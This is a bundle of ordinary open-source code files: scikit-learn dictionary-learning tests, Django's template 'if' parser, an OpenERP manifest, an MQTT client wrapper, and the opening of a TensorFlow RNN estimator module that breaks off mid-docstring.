    dico = MiniBatchDictionaryLearning(n_components, n_iter=20, random_state=0)
    dico.fit(X)
    assert_true(dico.components_.shape == (n_components, n_features))


def test_dict_learning_online_overcomplete():
    n_components = 12
    dico = MiniBatchDictionaryLearning(n_components, n_iter=20,
                                       random_state=0).fit(X)
    assert_true(dico.components_.shape == (n_components, n_features))


def test_dict_learning_online_initialization():
    # With n_iter=0 the dictionary must stay exactly at its initial value.
    n_components = 12
    rng = np.random.RandomState(0)
    V = rng.randn(n_components, n_features)
    dico = MiniBatchDictionaryLearning(n_components, n_iter=0,
                                       dict_init=V, random_state=0).fit(X)
    assert_array_equal(dico.components_, V)


def test_dict_learning_online_partial_fit():
    # Repeated partial_fit passes must land close to a single equivalent fit.
    n_components = 12
    rng = np.random.RandomState(0)
    V = rng.randn(n_components, n_features)  # random init
    V /= np.sum(V ** 2, axis=1)[:, np.newaxis]
    dict1 = MiniBatchDictionaryLearning(n_components, n_iter=10 * len(X),
                                        batch_size=1,
                                        alpha=1, shuffle=False, dict_init=V,
                                        random_state=0).fit(X)
    dict2 = MiniBatchDictionaryLearning(n_components, alpha=1,
                                        n_iter=1, dict_init=V,
                                        random_state=0)
    for i in range(10):
        for sample in X:
            dict2.partial_fit(sample[np.newaxis, :])

    assert_true(not np.all(sparse_encode(X, dict1.components_, alpha=1) ==
                           0))
    assert_array_almost_equal(dict1.components_, dict2.components_,
                              decimal=2)
def test_sparse_encode_shapes():
    # Every supported algorithm must return an (n_samples, n_components) code.
    n_components = 12
    rng = np.random.RandomState(0)
    V = rng.randn(n_components, n_features)  # random init
    V /= np.sum(V ** 2, axis=1)[:, np.newaxis]
    for algo in ('lasso_lars', 'lasso_cd', 'lars', 'omp', 'threshold'):
        code = sparse_encode(X, V, algorithm=algo)
        assert_equal(code.shape, (n_samples, n_components))


def test_sparse_encode_error():
    # With a tiny regularization the code is nonzero and reconstructs X well.
    n_components = 12
    rng = np.random.RandomState(0)
    V = rng.randn(n_components, n_features)  # random init
    V /= np.sum(V ** 2, axis=1)[:, np.newaxis]
    code = sparse_encode(X, V, alpha=0.001)
    assert_true(not np.all(code == 0))
    assert_less(np.sqrt(np.sum((np.dot(code, V) - X) ** 2)), 0.1)


def test_sparse_encode_error_default_sparsity():
    # Non-regression: omp with n_nonzero_coefs=None must use a sane default.
    rng = np.random.RandomState(0)
    X = rng.randn(100, 64)
    D = rng.randn(2, 64)
    code = ignore_warnings(sparse_encode)(X, D, algorithm='omp',
                                          n_nonzero_coefs=None)
    assert_equal(code.shape, (100, 2))


def test_unknown_method():
    # An unrecognized algorithm name must raise ValueError.
    n_components = 12
    rng = np.random.RandomState(0)
    V = rng.randn(n_components, n_features)  # random init
    assert_raises(ValueError, sparse_encode, X, V, algorithm="<unknown>")


def test_sparse_coder_estimator():
    # The SparseCoder estimator wrapper must match the functional behaviour.
    n_components = 12
    rng = np.random.RandomState(0)
    V = rng.randn(n_components, n_features)  # random init
    V /= np.sum(V ** 2, axis=1)[:, np.newaxis]
    code = SparseCoder(dictionary=V, transform_algorithm='lasso_lars',
                       transform_alpha=0.001).transform(X)
    assert_true(not np.all(code == 0))
    assert_less(np.sqrt(np.sum((np.dot(code, V) - X) ** 2)), 0.1)
|
knowsis/django | refs/heads/nonrel-1.6 | django/template/smartif.py | 239 | """
Parser and utilities for the smart 'if' tag
"""
# Using a simple top down parser, as described here:
# http://effbot.org/zone/simple-top-down-parsing.htm.
# 'led' = left denotation
# 'nud' = null denotation
# 'bp' = binding power (left = lbp, right = rbp)
class TokenBase(object):
    """
    Common behaviour shared by operator and literal tokens; exists mainly so
    that debugging output and syntax errors work uniformly.
    """
    id = None  # node/token type name
    value = None  # used by literals
    first = second = None  # used by tree nodes

    def nud(self, parser):
        # Null denotation - called in prefix context
        raise parser.error_class(
            "Not expecting '%s' in this position in if tag." % self.id
        )

    def led(self, left, parser):
        # Left denotation - called in infix context
        raise parser.error_class(
            "Not expecting '%s' as infix operator in if tag." % self.id
        )

    def display(self):
        """
        Text shown for this node in error messages.
        """
        return self.id

    def __repr__(self):
        parts = (str(piece) for piece in (self.id, self.first, self.second)
                 if piece is not None)
        return "(" + " ".join(parts) + ")"
def infix(bp, func):
    """
    Creates an infix operator, given a binding power and a function that
    evaluates the node

    bp: left binding power of the operator (higher binds tighter).
    func: callable (context, first, second) -> result of the operation.
    Returns a new TokenBase subclass implementing the operator.
    """
    class Operator(TokenBase):
        lbp = bp

        def led(self, left, parser):
            # Record the already-parsed left operand, then parse the right
            # operand with this operator's own binding power.
            self.first = left
            self.second = parser.expression(bp)
            return self

        def eval(self, context):
            try:
                return func(context, self.first, self.second)
            except Exception:
                # Templates shouldn't throw exceptions when rendering. We are
                # most likely to get exceptions for things like {% if foo in bar
                # %} where 'bar' does not support 'in', so default to False
                return False

    return Operator
def prefix(bp, func):
    """
    Creates a prefix operator, given a binding power and a function that
    evaluates the node.

    bp: binding power used when parsing the single operand.
    func: callable (context, first) -> result of the operation.
    Returns a new TokenBase subclass implementing the operator.
    """
    class Operator(TokenBase):
        lbp = bp

        def nud(self, parser):
            # Prefix operators take a single operand, parsed at this
            # operator's binding power; 'second' is unused.
            self.first = parser.expression(bp)
            self.second = None
            return self

        def eval(self, context):
            try:
                return func(context, self.first)
            except Exception:
                # Mirrors Operator.eval in infix(): rendering must never
                # raise, so any evaluation failure collapses to False.
                return False

    return Operator
# Operator precedence follows Python.
# NB - we can get slightly more accurate syntax error messages by not using the
# same object for '==' and '='.
# We defer variable evaluation to the lambda to ensure that terms are
# lazily evaluated using Python's boolean parsing logic.
# Binding powers mirror Python's precedence:
# 'or' (6) < 'and' (7) < 'not' (8) < 'in'/'not in' (9) < comparisons (10).
OPERATORS = {
    'or': infix(6, lambda context, x, y: x.eval(context) or y.eval(context)),
    'and': infix(7, lambda context, x, y: x.eval(context) and y.eval(context)),
    'not': prefix(8, lambda context, x: not x.eval(context)),
    'in': infix(9, lambda context, x, y: x.eval(context) in y.eval(context)),
    'not in': infix(9, lambda context, x, y: x.eval(context) not in y.eval(context)),
    # '=' is accepted as an alias for '==' (kept as a distinct class object;
    # see the NB above).
    '=': infix(10, lambda context, x, y: x.eval(context) == y.eval(context)),
    '==': infix(10, lambda context, x, y: x.eval(context) == y.eval(context)),
    '!=': infix(10, lambda context, x, y: x.eval(context) != y.eval(context)),
    '>': infix(10, lambda context, x, y: x.eval(context) > y.eval(context)),
    '>=': infix(10, lambda context, x, y: x.eval(context) >= y.eval(context)),
    '<': infix(10, lambda context, x, y: x.eval(context) < y.eval(context)),
    '<=': infix(10, lambda context, x, y: x.eval(context) <= y.eval(context)),
}
# Assign 'id' to each:
for key, op in OPERATORS.items():
    op.id = key
class Literal(TokenBase):
    """
    A self-resolving leaf node, analogous to a Django template variable.
    """
    # IfParser uses Literal in create_var, but TemplateIfParser overrides
    # create_var with an implementation that actually resolves variables,
    # filters etc.
    id = "literal"
    lbp = 0
    def __init__(self, value):
        self.value = value
    def nud(self, parser):
        # A literal in prefix position simply resolves to itself.
        return self
    def eval(self, context):
        return self.value
    def display(self):
        return repr(self.value)
    def __repr__(self):
        return "({0} {1!r})".format(self.id, self.value)
class EndToken(TokenBase):
    # Sentinel marking the end of the token stream; lbp of 0 stops the
    # binding-power loop in IfParser.expression().
    lbp = 0
    def nud(self, parser):
        raise parser.error_class("Unexpected end of expression in if tag.")
# Shadow the class with its singleton instance; IfParser.parse() compares
# against it with 'is'.
EndToken = EndToken()
class IfParser(object):
    """Top-down (Pratt) parser for smart 'if' expressions."""
    error_class = ValueError
    def __init__(self, tokens):
        # Pre-pass: fuse the two-token sequence 'not', 'in' into the single
        # 'not in' operator before translating tokens.
        num_tokens = len(tokens)
        translated = []
        pos = 0
        while pos < num_tokens:
            tok = tokens[pos]
            if tok == "not" and pos + 1 < num_tokens and tokens[pos + 1] == "in":
                tok = "not in"
                pos += 1  # consume the trailing 'in'
            translated.append(self.translate_token(tok))
            pos += 1
        self.tokens = translated
        self.pos = 0
        self.current_token = self.next_token()
    def translate_token(self, token):
        try:
            op_class = OPERATORS[token]
        except (KeyError, TypeError):
            # Not an operator (or an unhashable token): treat it as a
            # variable/literal.
            return self.create_var(token)
        return op_class()
    def next_token(self):
        if self.pos < len(self.tokens):
            token = self.tokens[self.pos]
            self.pos += 1
            return token
        return EndToken
    def parse(self):
        parsed = self.expression()
        # All tokens must have been consumed by the expression.
        if self.current_token is not EndToken:
            raise self.error_class("Unused '%s' at end of if expression." %
                                   self.current_token.display())
        return parsed
    def expression(self, rbp=0):
        token = self.current_token
        self.current_token = self.next_token()
        left = token.nud(self)
        # Keep binding while the next operator binds tighter than rbp.
        while rbp < self.current_token.lbp:
            token = self.current_token
            self.current_token = self.next_token()
            left = token.led(left, self)
        return left
    def create_var(self, value):
        return Literal(value)
|
jmesteve/openerpseda | refs/heads/master | openerp/addons_extra/base_extend/__openerp__.py | 2 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (c) 2013 jmesteve All Rights Reserved
# https://github.com/jmesteve
# <jmesteve@me.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Base Extend',
'version': '1.0',
'author': 'jmesteve',
'category': 'Hidden',
'description': """
[ENG] Extend module base .
""",
'website': 'https://github.com/jmesteve',
'license': 'AGPL-3',
'images': [],
'depends' : ['base'],
'data': ['base_extend.xml'],
'demo': [],
'installable': True,
'application': True,
'auto_install': False,
}
|
robotarium/vizier | refs/heads/master | vizier/mqttinterface.py | 1 | import paho.mqtt.client as mqtt
import queue
import threading
import string
import random
import enum
import vizier.log as log
# CountDownLatch for some MQTT client checking
class _CountDownLatch():
"""This class handles some synchronization behind starting the paho MQTT client
Attributes:
_cv (threading.Condition): Condition variable for waiting on the countdown.
_count (int): Current count of the latch. Calls to wait return when count reaches 0.
"""
def __init__(self, count=1):
self._cv = threading.Condition()
self._count = count
def _counted_down(self):
"""Helper function to determine if the countdown has occured"""
return self._count <= 0
def count_down(self):
"""Thread safe. When the count reaches 0, all waits return"""
with self._cv:
self._count -= 1
self._count = max(self._count, 0)
if(self._count <= 0):
self._cv.notify_all()
def wait(self, timeout=None):
"""Thread safe. Waits for the count to reach 0.
Args:
timeout (double): timeout to wait on latch.
"""
with self._cv:
self._cv.wait_for(self._counted_down, timeout=timeout)
class _Task(enum.Enum):
    # Work items placed on MQTTInterface._signal_reconnect; RECONNECT asks
    # the background thread to resubscribe to all registered topics
    # (a raw None on the queue is the shutdown sentinel).
    RECONNECT = 0
class MQTTInterface:
    """This is a wrapper around the Paho MQTT interface with enhanced functionality

    Attributes:
        host (str): The MQTT broker's host to which this client connects.
        port (int): The MQTT broker's port to which this client connects.
    """
    def __init__(self, port=1884, keep_alive=5, host="localhost"):
        """Initializes the interface without connecting to the broker.

        Args:
            port (int): Port of the MQTT broker.
            keep_alive (int): Keep-alive interval in seconds; also used as the
                maximum automatic-reconnect delay.
            host (str): Hostname of the MQTT broker.
        """
        # Set up MQTT client
        self._host = host
        self._port = port
        self._keep_alive = keep_alive
        # Internal thread to handle reconnects/resubscribes
        self._reconnect_thread = None
        self._signal_reconnect = queue.Queue()
        # Lock protecting self._callbacks and client (un)subscribe calls
        self._lock = threading.Lock()
        # Generate a suitably random ID for the MQTT client
        self._id = 'python_mqtt_' + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(30))
        self._client = mqtt.Client(client_id=self._id)
        self._client.on_message = self._on_message
        # TODO: Don't hardcode 1
        self._client.reconnect_delay_set(min_delay=1, max_delay=self._keep_alive)
        # Latch allows start() to block until the first successful connect
        self._cdl = _CountDownLatch(1)
        self._client.on_connect = self._on_connect
        # Maps topic -> callback; mutated under self._lock
        self._callbacks = {}
        self._logger = log.get_logger()
        # Lifecycle flags: start() and stop() may each be called once
        self._stopped = False
        self._started = False
    def _on_connect(self, client, userdata, flags, rc):
        """Called whenever the MQTT client connects to the MQTT broker.

        It's also called when the client reconnects, so we handle signaling the
        reconnect thread in this as well.

        Args:
            client: Paho client instance (unused).
            userdata: Private user data (unused).
            flags: Broker response flags (unused).
            rc: Connection result code (unused).
        """
        self._logger.info('MQTT client successfully connected to broker on host: {0}, port: {1}'.format(self._host, self._port))
        self._cdl.count_down()
        # Signal reconnect thread to resubscribe to all registered topics
        self._signal_reconnect.put(_Task.RECONNECT)
    def _internal_reconnect_task(self):
        """Meant to be run in an internal thread that handles reconnects.

        This may seem a little weird, but reconnections must be handled this way due to the underlying implementation of the
        Paho MQTT library.  The thread loops until a None sentinel is enqueued
        by stop().
        """
        msg = -1
        # Thread stops when None is enqueued
        while (msg is not None):
            msg = self._signal_reconnect.get()
            # msg can only be one of the enum items
            if(msg == _Task.RECONNECT):
                self._logger.info('Reconnect message received. Resubscribing to topics ({}).'.format(self._callbacks.keys()))
                with self._lock:
                    # Re-establish every subscription that was registered
                    # before the connection dropped
                    for sub in self._callbacks.keys():
                        self._client.subscribe(sub)
    def _on_message(self, client, userdata, msg):
        """Thread safe. Callback handling messages from the client. Either puts the message into a callback or a channel

        Args:
            client: Client from which message was recieved.
            userdata: Data about the client.
            msg: MQTT payload.
        """
        callback = self._callbacks.get(msg.topic)
        if(callback is not None):
            callback(msg.payload)
    def subscribe_with_callback(self, channel, callback):
        """Thread safe. Subscribes to a channel with a callback using the underlying MQTT client.

        All messages to that channel will be passed into the callback.

        Args:
            channel (str): Channel to which the node subscribes.
            callback (function): Callback function for the topic.
        """
        with self._lock:
            self._callbacks.update({channel: callback})
            self._client.subscribe(channel)
    def subscribe(self, channel):
        """Thread safe. A subscribe routine that yields a queue to which all subsequent messages to the given topic will be passed.

        Args:
            channel (str): Channel to which the client will subscribe.

        Returns:
            A queue containing all future messages from the supplied channel.
        """
        # Should be thread safe, since locking is handled in subscribe_with_callback
        q = queue.Queue()
        def f(msg):
            nonlocal q
            q.put(msg)
        self.subscribe_with_callback(channel, f)
        return q
    def unsubscribe(self, channel):
        """Thread safe. Unsubscribes from a particular channel.

        Args:
            channel (str): Channel from which the client unsubscribes.
        """
        with self._lock:
            self._client.unsubscribe(channel)
            self._callbacks.pop(channel, None)
    def send_message(self, channel, message):
        """Thread safe. Sends a message on the MQTT client.

        Args:
            channel (str): string (channel on which to send message).
            message (bytes): Message to be sent. Should be in an encoded bytes format (like UTF-8).
        """
        self._client.publish(channel, message)
    def start(self, timeout=None):
        """Handles starting the underlying MQTT client.

        Args:
            timeout (double): Maximum time to wait for the first connection.

        Raises:
            ValueError: If called twice, or after stop().
            RuntimeError: If the client cannot connect to the broker.
        """
        if(self._started):
            error_msg = 'Cannot call start more than once.'
            self._logger.error(error_msg)
            raise ValueError(error_msg)
        if(self._stopped):
            error_msg = 'Cannot call start after calling stop.'
            self._logger.error(error_msg)
            raise ValueError(error_msg)
        self._started = True
        # Attempt to connect the client to the specified broker
        try:
            self._client.connect(self._host, self._port, self._keep_alive)
        except Exception as e:
            error_msg = 'MQTT client could not connect to broker at host: {0}, port: {1}'.format(self._host, self._port)
            self._logger.error(error_msg)
            self._logger.error(repr(e))
            raise RuntimeError(error_msg)
        # Starts MQTT client in background thread. This has to be done before the client will process any messages
        self._client.loop_start()
        # Start the reconnect thread
        self._reconnect_thread = threading.Thread(target=self._internal_reconnect_task)
        self._reconnect_thread.start()
        # Have to start client before we wait on CDL. Client won't process any messages until we start it
        self._cdl.wait(timeout=timeout)
    def stop(self):
        """Handles stopping the MQTT client.

        Raises:
            ValueError: If called before start().
        """
        if(self._started):
            # Stop reconnect thread (None is the shutdown sentinel)
            self._signal_reconnect.put(None)
            self._reconnect_thread.join()
            # Stops MQTT client
            self._client.loop_stop()
            # Bug fix: record that the interface has been stopped. Previously
            # this flag was never set, so the 'Cannot call start after calling
            # stop.' guard in start() was unreachable.
            self._stopped = True
        else:
            error_msg = 'Cannot call stop before calling start.'
            self._logger.error(error_msg)
            raise ValueError(error_msg)
|
tillahoffmann/tensorflow | refs/heads/master | tensorflow/contrib/learn/python/learn/estimators/dynamic_rnn_estimator.py | 46 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Estimator for Dynamic RNNs."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import layers
from tensorflow.contrib.layers.python.layers import optimizers
from tensorflow.contrib.learn.python.learn.estimators import constants
from tensorflow.contrib.learn.python.learn.estimators import estimator
from tensorflow.contrib.learn.python.learn.estimators import model_fn
from tensorflow.contrib.learn.python.learn.estimators import prediction_key
from tensorflow.contrib.learn.python.learn.estimators import rnn_common
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import rnn
from tensorflow.python.training import momentum as momentum_opt
from tensorflow.python.util import nest
# TODO(jtbates): Remove PredictionType when all non-experimental targets which
# depend on it point to rnn_common.PredictionType.
class PredictionType(object):
  """Legacy prediction-type constants; duplicates rnn_common.PredictionType."""
  SINGLE_VALUE = 1
  MULTIPLE_VALUE = 2
def _get_state_name(i):
  """Returns the dict key used for state component `i` (STATE_PREFIX_i)."""
  return '%s_%s' % (rnn_common.RNNKeys.STATE_PREFIX, i)
def state_tuple_to_dict(state):
  """Returns a dict containing flattened `state`.
  Args:
    state: A `Tensor` or a nested tuple of `Tensors`. All of the `Tensor`s must
      have the same rank and agree on all dimensions except the last.
  Returns:
    A dict containing the `Tensor`s that make up `state`. The keys of the dict
    are of the form "STATE_PREFIX_i" where `i` is the place of this `Tensor`
    in a depth-first traversal of `state`.
  """
  with ops.name_scope('state_tuple_to_dict'):
    state_dict = {}
    for i, component in enumerate(nest.flatten(state)):
      key = _get_state_name(i)
      if component is None:
        state_dict[key] = None
      else:
        # identity() names the tensor after its state key.
        state_dict[key] = array_ops.identity(component, name=key)
    return state_dict
def dict_to_state_tuple(input_dict, cell):
  """Reconstructs nested `state` from a dict containing state `Tensor`s.
  Args:
    input_dict: A dict of `Tensor`s.
    cell: An instance of `RNNCell`.
  Returns:
    If `input_dict` does not contain keys 'STATE_PREFIX_i' for `0 <= i < n`
    where `n` is the number of nested entries in `cell.state_size`, this
    function returns `None`. Otherwise, returns a `Tensor` if `cell.state_size`
    is an `int` or a nested tuple of `Tensor`s if `cell.state_size` is a nested
    tuple.
  Raises:
    ValueError: State is partially specified. The `input_dict` must contain
      values for all state components or none at all.
  """
  flat_state_sizes = nest.flatten(cell.state_size)
  state_tensors = []
  with ops.name_scope('dict_to_state_tuple'):
    for i, state_size in enumerate(flat_state_sizes):
      state_name = _get_state_name(i)
      state_tensor = input_dict.get(state_name)
      if state_tensor is not None:
        # Graph-level validation: the fed state must be a rank-2
        # [batch_size, state_size] tensor.
        rank_check = check_ops.assert_rank(
            state_tensor, 2, name='check_state_{}_rank'.format(i))
        shape_check = check_ops.assert_equal(
            array_ops.shape(state_tensor)[1],
            state_size,
            name='check_state_{}_shape'.format(i))
        # The identity op ties the assertions to any consumer of the state.
        with ops.control_dependencies([rank_check, shape_check]):
          state_tensor = array_ops.identity(state_tensor, name=state_name)
        state_tensors.append(state_tensor)
    if not state_tensors:
      # No state components supplied: caller falls back to the default state.
      return None
    elif len(state_tensors) == len(flat_state_sizes):
      # The zero state is used only as a structure template for repacking.
      dummy_state = cell.zero_state(batch_size=1, dtype=dtypes.bool)
      return nest.pack_sequence_as(dummy_state, state_tensors)
    else:
      raise ValueError(
          'RNN state was partially specified.'
          'Expected zero or {} state Tensors; got {}'.
          format(len(flat_state_sizes), len(state_tensors)))
def _concatenate_context_input(sequence_input, context_input):
  """Replicates `context_input` across all timesteps of `sequence_input`.
  Expands dimension 1 of `context_input` then tiles it `sequence_length` times.
  This value is appended to `sequence_input` on dimension 2 and the result is
  returned.
  Args:
    sequence_input: A `Tensor` of dtype `float32` and shape `[batch_size,
      padded_length, d0]`.
    context_input: A `Tensor` of dtype `float32` and shape `[batch_size, d1]`.
  Returns:
    A `Tensor` of dtype `float32` and shape `[batch_size, padded_length,
    d0 + d1]`.
  Raises:
    ValueError: If `sequence_input` does not have rank 3 or `context_input` does
      not have rank 2.
  """
  # Build graph-level assertions validating rank and dtype of both inputs;
  # they execute via the control_dependencies block below.
  seq_rank_check = check_ops.assert_rank(
      sequence_input,
      3,
      message='sequence_input must have rank 3',
      data=[array_ops.shape(sequence_input)])
  seq_type_check = check_ops.assert_type(
      sequence_input,
      dtypes.float32,
      message='sequence_input must have dtype float32; got {}.'.format(
          sequence_input.dtype))
  ctx_rank_check = check_ops.assert_rank(
      context_input,
      2,
      message='context_input must have rank 2',
      data=[array_ops.shape(context_input)])
  ctx_type_check = check_ops.assert_type(
      context_input,
      dtypes.float32,
      message='context_input must have dtype float32; got {}.'.format(
          context_input.dtype))
  with ops.control_dependencies(
      [seq_rank_check, seq_type_check, ctx_rank_check, ctx_type_check]):
    padded_length = array_ops.shape(sequence_input)[1]
    # [batch, d1] -> [batch, 1, d1] -> [batch, padded_length, d1]
    tiled_context_input = array_ops.tile(
        array_ops.expand_dims(context_input, 1),
        array_ops.concat([[1], [padded_length], [1]], 0))
  # Append the tiled context features along the feature dimension.
  return array_ops.concat([sequence_input, tiled_context_input], 2)
def build_sequence_input(features,
                         sequence_feature_columns,
                         context_feature_columns,
                         weight_collections=None,
                         scope=None):
  """Combine sequence and context features into input for an RNN.
  Args:
    features: A `dict` containing the input and (optionally) sequence length
      information and initial state.
    sequence_feature_columns: An iterable containing all the feature columns
      describing sequence features. All items in the set should be instances
      of classes derived from `FeatureColumn`.
    context_feature_columns: An iterable containing all the feature columns
      describing context features i.e. features that apply across all time
      steps. All items in the set should be instances of classes derived from
      `FeatureColumn`.
    weight_collections: List of graph collections to which weights are added.
    scope: Optional scope, passed through to parsing ops.
  Returns:
    A `Tensor` of dtype `float32` and shape `[batch_size, padded_length, ?]`.
    This will be used as input to an RNN.
  """
  # Work on a copy so the caller's features dict is not mutated.
  features = features.copy()
  features.update(layers.transform_features(
      features,
      list(sequence_feature_columns) + list(context_feature_columns or [])))
  sequence_input = layers.sequence_input_from_feature_columns(
      columns_to_tensors=features,
      feature_columns=sequence_feature_columns,
      weight_collections=weight_collections,
      scope=scope)
  if context_feature_columns is not None:
    context_input = layers.input_from_feature_columns(
        columns_to_tensors=features,
        feature_columns=context_feature_columns,
        weight_collections=weight_collections,
        scope=scope)
    # Context features are broadcast across timesteps and appended to the
    # per-timestep sequence features.
    sequence_input = _concatenate_context_input(sequence_input, context_input)
  return sequence_input
def construct_rnn(initial_state,
                  sequence_input,
                  cell,
                  num_label_columns,
                  dtype=dtypes.float32,
                  parallel_iterations=32,
                  swap_memory=True):
  """Build an RNN and apply a fully connected layer to get the desired output.
  Args:
    initial_state: The initial state to pass the RNN. If `None`, the
      default starting state for `self._cell` is used.
    sequence_input: A `Tensor` with shape `[batch_size, padded_length, d]`
      that will be passed as input to the RNN.
    cell: An initialized `RNNCell`.
    num_label_columns: The desired output dimension.
    dtype: dtype of `cell`.
    parallel_iterations: Number of iterations to run in parallel. Values >> 1
      use more memory but take less time, while smaller values use less memory
      but computations take longer.
    swap_memory: Transparently swap the tensors produced in forward inference
      but needed for back prop from GPU to CPU. This allows training RNNs
      which would typically not fit on a single GPU, with very minimal (or no)
      performance penalty.
  Returns:
    activations: The output of the RNN, projected to `num_label_columns`
      dimensions.
    final_state: A `Tensor` or nested tuple of `Tensor`s representing the final
      state output by the RNN.
  """
  with ops.name_scope('RNN'):
    rnn_outputs, final_state = rnn.dynamic_rnn(
        cell=cell,
        inputs=sequence_input,
        initial_state=initial_state,
        dtype=dtype,
        parallel_iterations=parallel_iterations,
        swap_memory=swap_memory,
        time_major=False)
    # Linear projection (activation_fn=None) of per-timestep RNN outputs to
    # the label dimension.
    activations = layers.fully_connected(
        inputs=rnn_outputs,
        num_outputs=num_label_columns,
        activation_fn=None,
        trainable=True)
    return activations, final_state
def _single_value_predictions(activations,
                              sequence_length,
                              target_column,
                              problem_type,
                              predict_probabilities):
  """Maps `activations` from the RNN to predictions for single value models.
  If `predict_probabilities` is `False`, this function returns a `dict`
  containing a single entry keyed by the prediction name. If
  `predict_probabilities` is `True`, it additionally contains an entry with key
  `PROBABILITIES_KEY` whose value is a `Tensor` of probabilities with shape
  `[batch_size, num_classes]`.
  Args:
    activations: Output from an RNN. Should have dtype `float32` and shape
      `[batch_size, padded_length, ?]`.
    sequence_length: A `Tensor` with shape `[batch_size]` and dtype `int32`
      containing the length of each sequence in the batch. If `None`, sequences
      are assumed to be unpadded.
    target_column: An initialized `TargetColumn`, calculate predictions.
    problem_type: Either `ProblemType.CLASSIFICATION` or
      `ProblemType.LINEAR_REGRESSION`.
    predict_probabilities: A Python boolean, indicating whether probabilities
      should be returned. Should only be set to `True` for
      classification/logistic regression problems.
  Returns:
    A `dict` mapping strings to `Tensors`.
  """
  with ops.name_scope('SingleValuePrediction'):
    # Only the activation at each sequence's final timestep matters.
    last_activations = rnn_common.select_last_activations(
        activations, sequence_length)
    if problem_type == constants.ProblemType.CLASSIFICATION:
      predictions_name = prediction_key.PredictionKey.CLASSES
    else:
      predictions_name = prediction_key.PredictionKey.SCORES
    if predict_probabilities:
      probabilities = target_column.logits_to_predictions(
          last_activations, proba=True)
      return {
          prediction_key.PredictionKey.PROBABILITIES: probabilities,
          predictions_name: math_ops.argmax(probabilities, 1),
      }
    predictions = target_column.logits_to_predictions(
        last_activations, proba=False)
    return {predictions_name: predictions}
def _multi_value_loss(
    activations, labels, sequence_length, target_column, features):
  """Maps `activations` from the RNN to loss for multi value models.
  Args:
    activations: Output from an RNN. Should have dtype `float32` and shape
      `[batch_size, padded_length, ?]`.
    labels: A `Tensor` with length `[batch_size, padded_length]`.
    sequence_length: A `Tensor` with shape `[batch_size]` and dtype `int32`
      containing the length of each sequence in the batch. If `None`, sequences
      are assumed to be unpadded.
    target_column: An initialized `TargetColumn`, calculate predictions.
    features: A `dict` containing the input and (optionally) sequence length
      information and initial state.
  Returns:
    A scalar `Tensor` containing the loss.
  """
  with ops.name_scope('MultiValueLoss'):
    # Mask out padded timesteps before computing the loss.
    masked_activations, masked_labels = rnn_common.mask_activations_and_labels(
        activations, labels, sequence_length)
    return target_column.loss(masked_activations, masked_labels, features)
def _single_value_loss(
    activations, labels, sequence_length, target_column, features):
  """Maps `activations` from the RNN to loss for single value models.
  Args:
    activations: Output from an RNN. Should have dtype `float32` and shape
      `[batch_size, padded_length, ?]`.
    labels: A `Tensor` with length `[batch_size]`.
    sequence_length: A `Tensor` with shape `[batch_size]` and dtype `int32`
      containing the length of each sequence in the batch. If `None`, sequences
      are assumed to be unpadded.
    target_column: An initialized `TargetColumn`, calculate predictions.
    features: A `dict` containing the input and (optionally) sequence length
      information and initial state.
  Returns:
    A scalar `Tensor` containing the loss.
  """
  with ops.name_scope('SingleValueLoss'):
    # Loss is computed against the activation at each sequence's final step.
    final_activations = rnn_common.select_last_activations(
        activations, sequence_length)
    return target_column.loss(final_activations, labels, features)
def _get_output_alternatives(prediction_type,
                             problem_type,
                             prediction_dict):
  """Constructs output alternatives dict for `ModelFnOps`.
  Args:
    prediction_type: either `MULTIPLE_VALUE` or `SINGLE_VALUE`.
    problem_type: either `CLASSIFICATION` or `LINEAR_REGRESSION`.
    prediction_dict: a dictionary mapping strings to `Tensor`s containing
      predictions.
  Returns:
    `None` or a dictionary mapping a string to an output alternative.
  Raises:
    ValueError: `prediction_type` is not one of `SINGLE_VALUE` or
      `MULTIPLE_VALUE`.
  """
  if prediction_type == rnn_common.PredictionType.MULTIPLE_VALUE:
    return None
  if prediction_type == rnn_common.PredictionType.SINGLE_VALUE:
    # Strip RNN state entries from the exported predictions.
    filtered_predictions = {}
    for key, tensor in prediction_dict.items():
      if rnn_common.RNNKeys.STATE_PREFIX not in key:
        filtered_predictions[key] = tensor
    return {'dynamic_rnn_output': (problem_type, filtered_predictions)}
  raise ValueError('Unrecognized prediction_type: {}'.format(prediction_type))
def _get_dynamic_rnn_model_fn(
    cell_type,
    num_units,
    target_column,
    problem_type,
    prediction_type,
    optimizer,
    sequence_feature_columns,
    context_feature_columns=None,
    predict_probabilities=False,
    learning_rate=None,
    gradient_clipping_norm=None,
    dropout_keep_probabilities=None,
    sequence_length_key=rnn_common.RNNKeys.SEQUENCE_LENGTH_KEY,
    dtype=dtypes.float32,
    parallel_iterations=None,
    swap_memory=True,
    name='DynamicRNNModel'):
  """Creates an RNN model function for an `Estimator`.
  The model function returns an instance of `ModelFnOps`. When
  `problem_type == ProblemType.CLASSIFICATION` and
  `predict_probabilities == True`, the returned `ModelFnOps` includes an output
  alternative containing the classes and their associated probabilities. When
  `predict_probabilities == False`, only the classes are included. When
  `problem_type == ProblemType.LINEAR_REGRESSION`, the output alternative
  contains only the predicted values.
  Args:
    cell_type: A string, a subclass of `RNNCell` or an instance of an `RNNCell`.
    num_units: A single `int` or a list of `int`s. The size of the `RNNCell`s.
